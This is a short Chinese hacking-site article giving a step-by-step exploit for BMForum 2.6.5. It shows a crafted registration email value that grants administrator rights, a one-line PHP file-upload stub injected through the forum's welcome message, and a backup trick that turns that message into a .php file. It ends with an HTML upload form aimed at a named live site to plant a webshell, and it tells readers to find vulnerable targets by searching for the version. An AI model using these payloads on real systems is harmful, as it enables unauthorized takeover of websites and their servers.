黑基网 首页 学院 网络安全 查看内容

BMF-提升權限之旅

2005-3-18 05:21| 投稿: security

摘要: 作者:ezboy    来源:www.wrsky.com 主要漏洞是發生在註冊會員時,部分資料沒有過濾|這個符號!!而這個討論區會員的存檔格式為XXX|XXXX|XXX...
作者:ezboy    来源:www.wrsky.com 主要漏洞是發生在註冊會員時,部分資料沒有過濾|這個符號!!而這個討論區會員的存檔格式為XXX|XXXX|XXXX|用|做為區隔的email這個欄位剛好沒被過濾到提交[email protected]|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|這樣的格式可以比照管理員的註冊格式,發現第19格為0為管理員!!!註冊完畢之後發現身分為管理員了!! ------------------可以在公告裡添加木馬,然後利用論壇備份成php檔!!!....End   hnxyy[F.S.T]完善如下: 受影响版本: BMForum Plus! 2.6.5 贺岁版BMForum Datium! 2.6.5 贺岁版 在baidu中搜以上版本,随便选一个,进入注册用户页面: 利用注册选项过滤不完整攻击。 mail选项填写格式: [email protected]|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0| 注册一用户eztest,密码:eztest,mail格式如上 登陆,点管理中心,用上面的用户和密码可以进入管理后台界面。 管理页面:adminindex.php 注册欢迎段信息的正文处输入; ';copy($_FILES[mf][tmp_name],$_FILES[mf][name])?> 论坛备份: 选择备份欢迎信息文件,其它都去掉 指定备份目录为: 备份路径: face/222 other目录是必须的。 完整路径: http://saiy.77yan.com/wrsky/face/222/other/welcome.php phpcl.htm <form ENCTYPE="multipart/form-data" action="http://saiy.77yan.com/wrsky/face/222/other/welcome.php"; method="POST"><input name="mf" type="file"><input value="send" type="submit"></form> 上传马2005.php,马的路径就是: http://saiy.77yan.com/wrsky/face/222/other/2005.php
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部